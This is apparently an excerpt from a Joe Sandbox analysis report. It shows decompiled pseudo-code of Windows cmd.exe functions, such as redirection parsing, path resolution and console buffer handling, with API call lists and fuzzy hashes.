                                    • Opcode Fuzzy Hash: 6cad21d06427e9c0ae52906e1e5b7ca901d78b711cd73aa69c338ffce1a03d55
                                    • Instruction Fuzzy Hash: CC51BF746047019FDB3CDF79E899A3A77E1EB95328B108A2EE46BC72D4DB30A441CB45
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    C-Code - Quality: 88%
                                    			E011E02B0(void* __ebx, intOrPtr* __ecx, void* __edi, void* __esi) {
                                    				intOrPtr _v8;
                                    				void* _v16;
                                    				signed short* _v20;
                                    				signed short _v24;
                                    				signed short _t29;
                                    				signed int _t30;
                                    				intOrPtr _t31;
                                    				int _t34;
                                    				intOrPtr* _t36;
                                    				intOrPtr _t39;
                                    				int _t47;
                                    				intOrPtr _t48;
                                    				intOrPtr* _t59;
                                    				intOrPtr* _t63;
                                    				signed short _t69;
                                    				signed short* _t70;
                                    				intOrPtr* _t71;
                                    				signed short _t76;
                                    				intOrPtr* _t77;
                                    				signed short _t83;
                                    				void* _t91;
                                    				void* _t95;
                                    
                                    				_v8 =  *((intOrPtr*)(_t91 + 4));
                                    				_t95 = (_t91 - 0x00000008 & 0xfffffff8) + 4 - 0x10;
                                    				_t83 = 0;
                                    				_v16 = __ecx;
                                    				_v24 = 0;
                                    				while(1) {
                                    					_t69 =  *0x120faa0;
                                    					_t29 = _t69 & 0x0000ffff;
                                    					_t76 = _t29;
                                    					_v20 = _t29;
                                    					_t30 = _t76 & 0x0000ffff;
                                    					if(_t30 == 0x3e || _t30 == 0x3c) {
                                    						goto L7;
                                    					}
                                    					_t41 = iswdigit(_t69 & 0x0000ffff);
                                    					_t95 = _t95 + 4;
                                    					if(_t41 != 0) {
                                    						_t76 =  *0x120faa2;
                                    						_t41 = _t76 & 0x0000ffff;
                                    						if(_t41 != 0x3e) {
                                    							if(_t41 == 0x3c) {
                                    								goto L7;
                                    							} else {
                                    								goto L4;
                                    							}
                                    						} else {
                                    							goto L7;
                                    						}
                                    					} else {
                                    						L4:
                                    						if(_t83 != 0) {
                                    							if(_v24 == _t83) {
                                    								E011DF300(_t41, 0, 0, 0);
                                    							}
                                    							return 1;
                                    						} else {
                                    							return 0;
                                    						}
                                    					}
                                    					L40:
                                    					L7:
                                    					_t31 = E011E00B0(0x18);
                                    					_t59 = _v16;
                                    					 *_t59 = _t31;
                                    					if(_t31 == 0) {
                                    						 *0x120f980 = 0x234a;
                                    						__imp__longjmp(0x120b940, 1);
                                    						asm("int3");
                                    						if(_t59 <= 0xc42e || _t59 == 0xc431 || _t59 == 0xc433) {
                                    							_t69 = 0;
                                    						}
                                    						return _t69;
                                    					} else {
                                    						 *(_t31 + 0x10) = _t76;
                                    						_t83 = _t83 + 1;
                                    						_v20 = 0x120faa0;
                                    						_t34 = iswdigit( *0x120faa0 & 0x0000ffff);
                                    						_t95 = _t95 + 4;
                                    						_t36 =  *_v16;
                                    						if(_t34 != 0) {
                                    							 *_t36 = ( *0x120faa0 & 0x0000ffff) - 0x30;
                                    							_t63 = 0x120faa2;
                                    						} else {
                                    							_t63 = _v20;
                                    							if(_t76 != 0x3e) {
                                    								 *_t36 = 0;
                                    							} else {
                                    								 *_t36 = 1;
                                    							}
                                    						}
                                    						_t11 = _t63 + 2; // 0x120faa4
                                    						_t70 = _t11;
                                    						_v20 = _t70;
                                    						if( *_t63 !=  *_t70) {
                                    							_t77 = _v16;
                                    						} else {
                                    							if(_t76 == 0x3c) {
                                    								E011F82EB(_t63);
                                    								_t70 = _v20;
                                    							}
                                    							_t77 = _v16;
                                    							_t63 = _t70;
                                    							 *((intOrPtr*)( *_t77 + 0xc)) = 1;
                                    						}
                                    						_t64 = _t63 + 2;
                                    						_v20 = _t64;
                                    						if( *_t64 == 0x26) {
                                    							_t71 = _t64;
                                    							_t22 = _t71 + 2; // 0x120faa2
                                    							_v16 = _t22;
                                    							do {
                                    								_t39 =  *_t71;
                                    								_t71 = _t71 + 2;
                                    							} while (_t39 != 0);
                                    							if(_t71 - _v16 >> 1 != 2) {
                                    								L28:
                                    								E011F82EB(_t64);
                                    							} else {
                                    								_t47 = iswdigit( *(_t64 + 2) & 0x0000ffff);
                                    								_t95 = _t95 + 4;
                                    								if(_t47 == 0) {
                                    									goto L28;
                                    								} else {
                                    									_t48 = E011DDF40(_v20);
                                    									_t64 =  *_t77;
                                    									 *((intOrPtr*)( *_t77 + 4)) = _t48;
                                    									if(_t48 == 0) {
                                    										goto L28;
                                    									}
                                    								}
                                    							}
                                    						} else {
                                    							 *((intOrPtr*)( *_t77 + 4)) = E011DDDCD(_t64);
                                    						}
                                    						if(E011DEEC8() == 0) {
                                    							goto L4;
                                    						} else {
                                    							E011DF030(0);
                                    							_v24 = _v24 + 1;
                                    							_v16 =  *_t77 + 0x14;
                                    							continue;
                                    						}
                                    					}
                                    					goto L40;
                                    				}
                                    			}

                                    APIs
                                    Memory Dump Source
                                    • Source File: 0000000B.00000002.941712573.00000000011D0000.00000040.00020000.sdmp, Offset: 011D0000, based on PE: true
                                    • Associated: 0000000B.00000002.941862977.0000000001219000.00000040.00020000.sdmp Download File
                                    • Associated: 0000000B.00000002.941891236.000000000121D000.00000040.00020000.sdmp Download File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_11_2_11d0000_cmd.jbxd
                                    Similarity
                                    • API ID: iswdigit
                                    • String ID:
                                    • API String ID: 3849470556-0
                                    • Opcode ID: 56c411d0bb0143154565cf3f04d095eab591efeb6e4135075c6b1875747ee49d
                                    • Instruction ID: d09a34828198d013f7ac1bce7e74096f6f9a04199d44658a5ec333314f793b97
                                    • Opcode Fuzzy Hash: 56c411d0bb0143154565cf3f04d095eab591efeb6e4135075c6b1875747ee49d
                                    • Instruction Fuzzy Hash: 4C51D470A046019FDB2DDFE9D59827EB7E1EB88304F15416AE90187381EBB59A82CB91
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    C-Code - Quality: 96%
                                    			E011E2D22(intOrPtr* __ecx, long __edx, WCHAR* _a4) {
                                    				long _v8;
                                    				WCHAR* _v12;
                                    				void* __ebx;
                                    				intOrPtr _t30;
                                    				void* _t31;
                                    				intOrPtr _t35;
                                    				short _t38;
                                    				signed short _t40;
                                    				int _t41;
                                    				long _t46;
                                    				intOrPtr _t49;
                                    				short _t50;
                                    				int _t53;
                                    				intOrPtr* _t60;
                                    				signed int _t62;
                                    				signed short* _t63;
                                    				intOrPtr* _t68;
                                    				signed int _t70;
                                    				void* _t72;
                                    				void* _t75;
                                    				signed short* _t76;
                                    				void* _t78;
                                    				WCHAR* _t80;
                                    				long _t82;
                                    				intOrPtr* _t84;
                                    				signed int _t86;
                                    				signed short* _t87;
                                    
                                    				_push(__ecx);
                                    				_push(__ecx);
                                    				_t80 = __ecx;
                                    				_v8 = __edx;
                                    				_t57 = _a4;
                                    				_t53 = 0;
                                    				_t84 = _a4;
                                    				_t3 = _t84 + 2; // 0x2
                                    				_t72 = _t3;
                                    				do {
                                    					_t30 =  *_t84;
                                    					_t84 = _t84 + 2;
                                    				} while (_t30 != 0);
                                    				_t86 = _t84 - _t72 >> 1;
                                    				_t31 = E011E22C0(0, _t57);
                                    				_t4 = _t86 + 1; // -1
                                    				_t87 = _a4;
                                    				E011E1040(_t87, _t4, _t31);
                                    				if(( *_t87 & 0x0000ffff) == 0) {
                                    					E011E36CB(0, __ecx, _v8, 0);
                                    					_t60 = __ecx + 4;
                                    					_t75 = _t60 + 2;
                                    					do {
                                    						_t35 =  *_t60;
                                    						_t60 = _t60 + 2;
                                    					} while (_t35 != 0);
                                    					_t62 = _t60 - _t75 >> 1;
                                    					if(_t62 + 3 < 0x7fe7) {
                                    						if(_t62 != 1) {
                                    							_t38 = 0x5c;
                                    							 *((short*)(__ecx + 4 + _t62 * 2)) = _t38;
                                    							 *((short*)(__ecx + 6 + _t62 * 2)) = 0;
                                    						}
                                    						goto L8;
                                    					}
                                    					 *0x1213cf0 = 3;
                                    					goto L21;
                                    				} else {
                                    					_t63 = _t87;
                                    					_t6 =  &(_t63[1]); // 0x2
                                    					_t76 = _t6;
                                    					do {
                                    						_t40 =  *_t63;
                                    						_t63 =  &(_t63[1]);
                                    					} while (_t40 != 0);
                                    					if(_t63 - _t76 >> 1 == 2) {
                                    						if(_t87[1] != 0x3a) {
                                    							goto L6;
                                    						}
                                    						E011E36CB(0, __ecx, _v8,  *_t87 & 0x0000ffff);
                                    						_t68 = __ecx;
                                    						_t78 = __ecx + 2;
                                    						do {
                                    							_t49 =  *_t68;
                                    							_t68 = _t68 + 2;
                                    						} while (_t49 != 0);
                                    						_t70 = _t68 - _t78 >> 1;
                                    						if(_t70 > 3) {
                                    							_t50 = 0x5c;
                                    							 *((short*)(__ecx + _t70 * 2)) = _t50;
                                    							 *((short*)(__ecx + 2 + _t70 * 2)) = 0;
                                    						}
                                    						L8:
                                    						return _t53;
                                    					}
                                    					L6:
                                    					_t41 = SetErrorMode(_t53);
                                    					SetErrorMode(1);
                                    					_t82 = _v8;
                                    					_v8 = GetFullPathNameW(_a4, _t82, _t80,  &_v12);
                                    					SetErrorMode(_t41);
                                    					_t46 = _v8;
                                    					if(_t46 == 0 || _t46 > _t82) {
                                    						 *0x1213cf0 = 0xce;
                                    						L21:
                                    						_t53 = 1;
                                    					}
                                    					goto L8;
                                    				}
                                    			}

                                    APIs
                                    • SetErrorMode.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0(00000000,00000000,?,00000000,00000000,?,?,?,011E3C29,?,00000000,-00000001,00000000,?,00000000), ref: 011E2D87
                                    • SetErrorMode.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0(00000001,?,011E3C29,?,00000000,-00000001,00000000,?,00000000), ref: 011E2D91
                                    • GetFullPathNameW.API-MS-WIN-CORE-FILE-L1-1-0(00000000,-00000001,?,00000000,?,011E3C29,?,00000000,-00000001,00000000,?,00000000), ref: 011E2DA4
                                    • SetErrorMode.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0(00000000,?,011E3C29,?,00000000,-00000001,00000000,?,00000000), ref: 011E2DAE
                                    Memory Dump Source
                                    • Source File: 0000000B.00000002.941712573.00000000011D0000.00000040.00020000.sdmp, Offset: 011D0000, based on PE: true
                                    • Associated: 0000000B.00000002.941862977.0000000001219000.00000040.00020000.sdmp Download File
                                    • Associated: 0000000B.00000002.941891236.000000000121D000.00000040.00020000.sdmp Download File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_11_2_11d0000_cmd.jbxd
                                    Similarity
                                    • API ID: ErrorMode$FullNamePath
                                    • String ID:
                                    • API String ID: 268959451-0
                                    • Opcode ID: f3d49440b11c6ae843187889818cca761bb1577a1bf445bedffb8b356851c5b0
                                    • Instruction ID: 4966c4f414c69bd40c7ef73025f77b80acc0af26ced68ebd90731c41d3a9fc39
                                    • Opcode Fuzzy Hash: f3d49440b11c6ae843187889818cca761bb1577a1bf445bedffb8b356851c5b0
                                    • Instruction Fuzzy Hash: B4414639500501ABCF2CDFE8D8698BEB7EEFF88704714851DEA06C7244E771AA41C790
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    C-Code - Quality: 84%
                                    			E011DEEF0(intOrPtr __ecx, intOrPtr __edx, intOrPtr _a4) {
                                    				void* __ebx;
                                    				intOrPtr _t8;
                                    				signed int _t9;
                                    				intOrPtr _t12;
                                    				void* _t18;
                                    				intOrPtr _t23;
                                    				signed int _t25;
                                    				void* _t32;
                                    				intOrPtr _t33;
                                    				intOrPtr _t34;
                                    				signed int _t35;
                                    				intOrPtr* _t36;
                                    
                                    				_t8 =  *0x1213cd8;
                                    				_t34 = _a4;
                                    				_t23 = __edx;
                                    				_t33 = __ecx;
                                    				 *0x120f980 = __ecx;
                                    				if(_t8 <= _t34) {
                                    					L4:
                                    					_t35 = 0;
                                    					_t9 = 0;
                                    					_t25 = 0;
                                    					do {
                                    						if(_t9 >= 0 && _t25 < 2) {
                                    							_t18 =  *(0x11fd5b8 + _t35 * 4);
                                    							if(_t18 != 0) {
                                    								VirtualFree(_t18, 0, 0x8000);
                                    								 *(0x11fd5b8 + _t35 * 4) = 0;
                                    							}
                                    						}
                                    						_t35 = _t35 + 1;
                                    						_t9 = _t35;
                                    						_t25 = _t9;
                                    					} while (_t35 < 2);
                                    					 *0x120b8ac = _t33;
                                    					_push(0);
                                    					_push(0x120b940);
                                    					 *0x120b8a8 = _t23;
                                    					 *0x1203892 = 0;
                                    					 *0x120b8a4 = 0x1203892;
                                    					 *0x120b8a0 = 0x1203892;
                                    					L011E82C1();
                                    					if(0 != 0) {
                                    						return 0;
                                    					}
                                    					 *0x11fd558 = 0;
                                    					 *0x11fd554 = 0;
                                    					_t36 = E011DDC74(_t23, 0);
                                    					if(_t36 == 0) {
                                    						_t12 = 1;
                                    					} else {
                                    						if(E011DEEC8() != 0 && E011DF030(0) != 0xa &&  *0x120fa90 != 0) {
                                    							E011F82EB(0);
                                    						}
                                    						_t12 = 0;
                                    					}
                                    					 *0x11fd5c8 = _t12;
                                    					if( *0x120fa88 != 0) {
                                    						E011F8121(_t36, 0);
                                    					}
                                    					return _t36;
                                    				}
                                    				while(1) {
                                    					_t32 =  *0x1213cdc;
                                    					if(_t32 == 0) {
                                    						goto L4;
                                    					}
                                    					 *_t32 = 0;
                                    					 *0x1213cdc =  *(_t32 + 4);
                                    					 *0x1213cd8 = _t8 - 1;
                                    					 *(_t32 + 4) = 0;
                                    					RtlFreeHeap(GetProcessHeap(), 0, _t32);
                                    					_t8 =  *0x1213cd8;
                                    					if(_t8 > _t34) {
                                    						continue;
                                    					}
                                    					goto L4;
                                    				}
                                    				goto L4;
                                    			}
















                                    APIs
                                    • GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(00000000,?,00000000,00000000,00000000,?,011DE5F6,?,00000000,00000000,00000000), ref: 011DEF39
                                    • RtlFreeHeap.NTDLL(00000000,?,011DE5F6), ref: 011DEF40
                                    • _setjmp3.MSVCRT ref: 011DEFA5
                                    • VirtualFree.API-MS-WIN-CORE-MEMORY-L1-1-0(00000000,00000000,00008000,00000000,00000000,00000000,?,011DE5F6,?,00000000,00000000,00000000), ref: 011DF00D
                                    Memory Dump Source
                                    • Source File: 0000000B.00000002.941712573.00000000011D0000.00000040.00020000.sdmp, Offset: 011D0000, based on PE: true
                                    • Associated: 0000000B.00000002.941862977.0000000001219000.00000040.00020000.sdmp
                                    • Associated: 0000000B.00000002.941891236.000000000121D000.00000040.00020000.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_11_2_11d0000_cmd.jbxd
                                    Similarity
                                    • API ID: FreeHeap$ProcessVirtual_setjmp3
                                    • String ID:
                                    • API String ID: 2613391085-0
                                    • Opcode ID: bec839cdf8302e77e33eeeb4fda6f59bf7eed430cf9b2d882cc8f4d348d48299
                                    • Instruction ID: 32d94aa905706fb3b5fd6c586a578578908704fa008467da15e92370d5f46cb2
                                    • Opcode Fuzzy Hash: bec839cdf8302e77e33eeeb4fda6f59bf7eed430cf9b2d882cc8f4d348d48299
                                    • Instruction Fuzzy Hash: 10319C716012119FEB3DEF6EB80C72A7AE5BB54B19F14416EE509CB285DB70D880CB92
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    C-Code - Quality: 51%
                                    			E011F579A(void* __ecx, void* __eflags) {
                                    				char* _v8;
                                    				void* __ebx;
                                    				void* __edi;
                                    				void* __esi;
                                    				void* __ebp;
                                    				void* _t7;
                                    				signed int _t13;
                                    				short _t21;
                                    				char* _t25;
                                    				int _t29;
                                    				short* _t32;
                                    				void* _t35;
                                    				short* _t37;
                                    				short* _t41;
                                    				int _t46;
                                    
                                    				_push(__ecx);
                                    				_t7 = E011E7797(__ecx);
                                    				if(_t7 != 0) {
                                    					_t7 =  *0x121c018(0, 0);
                                    					if(0 != 0) {
                                    						_t28 = 0;
                                    						_t41 = E011E00B0(0);
                                    						if(_t41 == 0) {
                                    							L3:
                                    							E011F9287(_t28);
                                    							__imp__longjmp(0x120b8b8, 1);
                                    						}
                                    						_t28 = 0;
                                    						_t25 = E011E00B0(0);
                                    						_v8 = _t25;
                                    						if(_t25 == 0) {
                                    							goto L3;
                                    						}
                                    						if(E011E7797(0) != 0) {
                                    							 *0x121c018(0, _t25);
                                    						}
                                    						_t29 =  *0x1203854;
                                    						_t13 = E011E0638(_t29);
                                    						asm("sbb eax, eax");
                                    						MultiByteToWideChar(_t29,  ~( ~_t13), _t25, 0xffffffff, _t41, 0);
                                    						_t46 = SetErrorMode(1);
                                    						if( *_t41 != 0) {
                                    							_t35 = 0;
                                    							do {
                                    								E011E33FC(0, _t41, _t35 + _t35, _t41, _t46, _t35 + _t35);
                                    								_t32 = _t41;
                                    								_t3 =  &(_t32[1]); // 0x2
                                    								_t37 = _t3;
                                    								do {
                                    									_t21 =  *_t32;
                                    									_t32 =  &(_t32[1]);
                                    								} while (_t21 != 0);
                                    								_t35 = 1;
                                    								_t41 =  &(( &(_t41[_t32 - _t37 >> 1]))[1]);
                                    							} while ( *_t41 != 0);
                                    							_t25 = _v8;
                                    						}
                                    						SetErrorMode(_t46);
                                    						_t7 = E011E0040(_t25);
                                    					}
                                    				}
                                    				return _t7;
                                    			}



















                                    APIs
                                      • Part of subcall function 011E00B0: GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(00000008,?,?,011DDF68,00000001,?,00000000,011E3458,-00000105,011FBDD8,00000240,011E4B82,00000000,00000000,011EAE6E,00000000), ref: 011E00C1
                                      • Part of subcall function 011E00B0: HeapAlloc.API-MS-WIN-CORE-HEAP-L1-1-0(00000000,?,011DDF68,00000001,?,00000000,011E3458,-00000105,011FBDD8,00000240,011E4B82,00000000,00000000,011EAE6E,00000000,?), ref: 011E00C8
                                    • longjmp.MSVCRT(0120B8B8,00000001,?,?,011E3A4E,?,?,?,?,?,?,?,?), ref: 011F57DE
                                    • MultiByteToWideChar.API-MS-WIN-CORE-STRING-L1-1-0(?,00000000,00000000,000000FF,00000000,00000000,?,?,011E3A4E), ref: 011F581D
                                    • SetErrorMode.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0(00000001,?,00000000,00000000,000000FF,00000000,00000000,?,?,011E3A4E), ref: 011F5825
                                    • SetErrorMode.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0(00000000,?,00000000,00000000,000000FF,00000000,00000000,?,?,011E3A4E), ref: 011F5867
                                    Memory Dump Source
                                    • Source File: 0000000B.00000002.941712573.00000000011D0000.00000040.00020000.sdmp, Offset: 011D0000, based on PE: true
                                    • Associated: 0000000B.00000002.941862977.0000000001219000.00000040.00020000.sdmp
                                    • Associated: 0000000B.00000002.941891236.000000000121D000.00000040.00020000.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_11_2_11d0000_cmd.jbxd
                                    Similarity
                                    • API ID: ErrorHeapMode$AllocByteCharMultiProcessWidelongjmp
                                    • String ID:
                                    • API String ID: 162963024-0
                                    • Opcode ID: 95fb2bb0f05b6380a9cc0043c9a2ff0d90be67f7e1d96659ec0edd1a89a86589
                                    • Instruction ID: 3470260970c4f6054cff1013fd6ad86558c2cb568a0ebd0c722e94788eab0564
                                    • Opcode Fuzzy Hash: 95fb2bb0f05b6380a9cc0043c9a2ff0d90be67f7e1d96659ec0edd1a89a86589
                                    • Instruction Fuzzy Hash: 53212C35700A029BD738EBB99C5C9BE775BDFD4254B19022CEE0687284DF718E4187A1
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    C-Code - Quality: 67%
                                    			E011E4E94(void*** __ecx, void* __edx, void* __eflags) {
                                    				signed int _v8;
                                    				struct _CONSOLE_SCREEN_BUFFER_INFO _v32;
                                    				void* __ebx;
                                    				void* __edi;
                                    				void* __esi;
                                    				signed int _t13;
                                    				void* _t16;
                                    				signed int _t17;
                                    				void* _t21;
                                    				void* _t22;
                                    				void*** _t27;
                                    				void* _t37;
                                    				void* _t38;
                                    				void** _t39;
                                    				signed int _t40;
                                    
                                    				_t37 = __edx;
                                    				_t13 =  *0x11fd0b4; // 0x2833377e
                                    				_v8 = _t13 ^ _t40;
                                    				_t27 = __ecx;
                                    				_t29 = 0x2c;
                                    				_t39 = E011E00B0(_t29);
                                    				if(_t39 == 0) {
                                    					L6:
                                    					_t16 = E011F9287(_t29);
                                    					__imp__longjmp(0x120b8b8, 1);
                                    					L7:
                                    					__imp___get_osfhandle(1);
                                    					 *_t39 = _t16;
                                    					_t17 = GetConsoleScreenBufferInfo(_t16,  &_v32);
                                    					if(_t17 == 0) {
                                    						 *_t39 =  *_t39 & _t17;
                                    					}
                                    					L2:
                                    					if(GetConsoleScreenBufferInfo( *_t39,  &_v32) != 0) {
                                    						_t38 = 0x2000;
                                    						_t21 = _v32.dwSize + 2;
                                    						if(_t21 >= 0x2000) {
                                    							_t38 = _t21;
                                    						}
                                    					} else {
                                    						_t38 = 0x2002;
                                    					}
                                    					_t29 = _t38 + _t38;
                                    					_t22 = E011E00B0(_t38 + _t38);
                                    					if(_t22 != 0) {
                                    						_t39[4] = _t22;
                                    						_t39[3] = _t38;
                                    						_t39[5] = 0;
                                    						_t39[2] = 0;
                                    						_t39[1] = 0;
                                    						_t39[9] = 0;
                                    						E011E4F29(_t39);
                                    						 *_t27 = _t39;
                                    						return E011E6FD0(0, _t27, _v8 ^ _t40, _t37, _t38, _t39);
                                    					}
                                    					goto L6;
                                    				}
                                    				 *_t39 =  *_t39 & 0x00000000;
                                    				_t16 = E011E0178(_t15);
                                    				if(_t16 != 0) {
                                    					goto L7;
                                    				}
                                    				goto L2;
                                    			}



















                                    APIs
                                      • Part of subcall function 011E00B0: GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(00000008,?,?,011DDF68,00000001,?,00000000,011E3458,-00000105,011FBDD8,00000240,011E4B82,00000000,00000000,011EAE6E,00000000), ref: 011E00C1
                                      • Part of subcall function 011E00B0: HeapAlloc.API-MS-WIN-CORE-HEAP-L1-1-0(00000000,?,011DDF68,00000001,?,00000000,011E3458,-00000105,011FBDD8,00000240,011E4B82,00000000,00000000,011EAE6E,00000000,?), ref: 011E00C8
                                    • GetConsoleScreenBufferInfo.API-MS-WIN-CORE-CONSOLE-L2-1-0(00000000,?,?,011E2F2C,-00000001,-00000001,-00000001,-00000001), ref: 011E4ED6
                                    • longjmp.MSVCRT(0120B8B8,00000001,?,00000104,00000000,?,?,011E2F2C,-00000001,-00000001,-00000001,-00000001), ref: 011EF016
                                    • _get_osfhandle.MSVCRT ref: 011EF01E
                                    • GetConsoleScreenBufferInfo.API-MS-WIN-CORE-CONSOLE-L2-1-0(00000000,?,?,011E2F2C,-00000001,-00000001,-00000001,-00000001), ref: 011EF02C
                                      • Part of subcall function 011E0178: _get_osfhandle.MSVCRT ref: 011E0183
                                      • Part of subcall function 011E0178: GetFileType.API-MS-WIN-CORE-FILE-L1-1-0(00000000,011ED6A1), ref: 011E018D
                                    Memory Dump Source
                                    • Source File: 0000000B.00000002.941712573.00000000011D0000.00000040.00020000.sdmp, Offset: 011D0000, based on PE: true
                                    • Associated: 0000000B.00000002.941862977.0000000001219000.00000040.00020000.sdmp
                                    • Associated: 0000000B.00000002.941891236.000000000121D000.00000040.00020000.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_11_2_11d0000_cmd.jbxd
                                    Similarity
                                    • API ID: BufferConsoleHeapInfoScreen_get_osfhandle$AllocFileProcessTypelongjmp
                                    • String ID:
                                    • API String ID: 1629431960-0
                                    • Opcode ID: 09e3627f18f4539bf6f7a05dd47c1a1860e7fe36fec9737f7a8998d7cf064fbe
                                    • Instruction ID: 2e8e8ef8b68457230fb79b11b6cbd85ca4eb97679f866bedc89ea06818a08adb
                                    • Opcode Fuzzy Hash: 09e3627f18f4539bf6f7a05dd47c1a1860e7fe36fec9737f7a8998d7cf064fbe
                                    • Instruction Fuzzy Hash: 0321F571A00B069FE7389FB4E44CB7ABBE5EF24715F04082EE846C6140EB75D801CB41
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    C-Code - Quality: 43%
                                    			E011DAEB0(void* __ecx, intOrPtr _a4) {
                                    				wchar_t* _v8;
                                    				wchar_t* _v12;
                                    				long _t25;
                                    				signed int _t26;
                                    				void* _t28;
                                    				signed int _t30;
                                    				void* _t31;
                                    				void* _t33;
                                    				void* _t34;
                                    				signed int _t36;
                                    				intOrPtr _t45;
                                    				long _t48;
                                    				signed int _t49;
                                    
                                    				_t45 = _a4;
                                    				_t48 = wcstol( *(_t45 + 0x38),  &_v8, 0);
                                    				_t25 = wcstol( *(_t45 + 0x3c),  &_v12, 0);
                                    				if( *_v8 != 0 ||  *_v12 != 0) {
                                    					_push( *(_t45 + 0x3c));
                                    					_push( *(_t45 + 0x38));
                                    					if(( *(_t45 + 0x40) & 0x00000002) != 0) {
                                    						_t26 = lstrcmpiW();
                                    					} else {
                                    						_t26 = lstrcmpW();
                                    					}
                                    					_t49 = _t26;
                                    					goto L3;
                                    				} else {
                                    					_t49 = _t48 - _t25;
                                    					L3:
                                    					_t28 =  *((intOrPtr*)(_t45 + 0x44)) - 1;
                                    					if(_t28 == 0) {
                                    						_t30 = 0 | _t49 == 0x00000000;
                                    						L9:
                                    						return _t30;
                                    					}
                                    					_t31 = _t28 - 1;
                                    					if(_t31 == 0) {
                                    						_t30 = 0 | _t49 != 0x00000000;
                                    						goto L9;
                                    					}
                                    					_t33 = _t31 - 1;
                                    					if(_t33 == 0) {
                                    						L14:
                                    						_t30 = _t49 >> 0x1f;
                                    						goto L9;
                                    					}
                                    					_t34 = _t33 - 1;
                                    					if(_t34 == 0) {
                                    						_t30 = 0 | _t49 <= 0x00000000;
                                    						goto L9;
                                    					}
                                    					_t36 = _t34 - 1;
                                    					if(_t36 != 0) {
                                    						if(_t36 != 1) {
                                    							_t30 = 0;
                                    							goto L9;
                                    						}
                                    						_t49 =  !_t49;
                                    						goto L14;
                                    					}
                                    					_t30 = _t36 & 0xffffff00 | _t49 > 0x00000000;
                                    					goto L9;
                                    				}
                                    			}

















                                    APIs
                                    • wcstol.MSVCRT ref: 011DAEC7
                                    • wcstol.MSVCRT ref: 011DAED7
                                    • lstrcmpW.API-MS-WIN-CORE-STRING-OBSOLETE-L1-1-0(?,?), ref: 011DAF51
                                    • lstrcmpiW.API-MS-WIN-CORE-STRING-OBSOLETE-L1-1-0(?,?), ref: 011DAF5B
                                    Memory Dump Source
                                    • Source File: 0000000B.00000002.941712573.00000000011D0000.00000040.00020000.sdmp, Offset: 011D0000, based on PE: true
                                    • Associated: 0000000B.00000002.941862977.0000000001219000.00000040.00020000.sdmp
                                    • Associated: 0000000B.00000002.941891236.000000000121D000.00000040.00020000.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_11_2_11d0000_cmd.jbxd
                                    Similarity
                                    • API ID: wcstol$lstrcmplstrcmpi
                                    • String ID:
                                    • API String ID: 4273384694-0
                                    • Opcode ID: 65c62201fb017387a4d3b455d680fab5252e61a9b53894a2ef43e8d82d4f4729
                                    • Instruction ID: c35f12d9e28c13a1475bf28ff1810d70f98651d886688a9cd6f5d20969a42f23
                                    • Opcode Fuzzy Hash: 65c62201fb017387a4d3b455d680fab5252e61a9b53894a2ef43e8d82d4f4729
                                    • Instruction Fuzzy Hash: A511A5B2900526AB8B6DDE7CFA5C8797B68FF0125470603D0E901D79C4D725ED60C6D2
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    C-Code - Quality: 79%
                                    			E011F997C(WCHAR* __ecx, void* __edi) {
                                    				signed int _v8;
                                    				long _v20;
                                    				char _v24;
                                    				signed int _v28;
                                    				void _v548;
                                    				WCHAR* _v552;
                                    				void* __ebx;
                                    				void* __esi;
                                    				signed int _t24;
                                    				WCHAR* _t37;
                                    				long _t38;
                                    				void* _t39;
                                    				WCHAR* _t40;
                                    				char _t43;
                                    				void* _t51;
                                    				void* _t52;
                                    				WCHAR* _t53;
                                    				signed int _t54;
                                    
                                    				_t52 = __edi;
                                    				_t24 =  *0x11fd0b4; // 0x2833377e
                                    				_v8 = _t24 ^ _t54;
                                    				_v552 = _v552 & 0x00000000;
                                    				_v28 = _v28 & 0x00000000;
                                    				_v20 = 0x104;
                                    				_t43 = 1;
                                    				_t53 = __ecx;
                                    				_v24 = 1;
                                    				memset( &_v548, 0, 0x104);
                                    				if(E011E0C70( &_v548, ((0 | _v24 == 0x00000000) - 0x00000001 & 0x0000fdc6) + 0x208) < 0) {
                                    					L10:
                                    					_t43 = 0;
                                    				} else {
                                    					_t37 = _v28;
                                    					if(_t37 == 0) {
                                    						_t37 =  &_v548;
                                    					}
                                    					_t38 = GetFullPathNameW(_t53, _v20, _t37,  &_v552);
                                    					if(_t38 == 0 || _t38 <= 0xffce) {
                                    						goto L10;
                                    					} else {
                                    						_t39 = _v28;
                                    						if(_t39 == 0) {
                                    							_t39 =  &_v548;
                                    						}
                                    						 *((short*)(_t39 + 6)) = 0;
                                    						_t40 = _v28;
                                    						if(_t40 == 0) {
                                    							_t40 =  &_v548;
                                    						}
                                    						if(GetDriveTypeW(_t40) != 4) {
                                    							goto L10;
                                    						}
                                    					}
                                    				}
                                    				__imp__??_V@YAXPAX@Z();
                                    				return E011E6FD0(_t43, _t43, _v8 ^ _t54, _t51, _t52, _t53, _v28);
                                    			}






















                                    APIs
                                    • memset.MSVCRT ref: 011F99B8
                                      • Part of subcall function 011E0C70: ??_V@YAXPAX@Z.MSVCRT ref: 011E0CBA
                                      • Part of subcall function 011E0C70: memset.MSVCRT ref: 011E0CDD
                                    • GetFullPathNameW.API-MS-WIN-CORE-FILE-L1-1-0(004D0043,-00000209,00000000,00000000,-00000209,?,011D2178,00310030), ref: 011F99FC
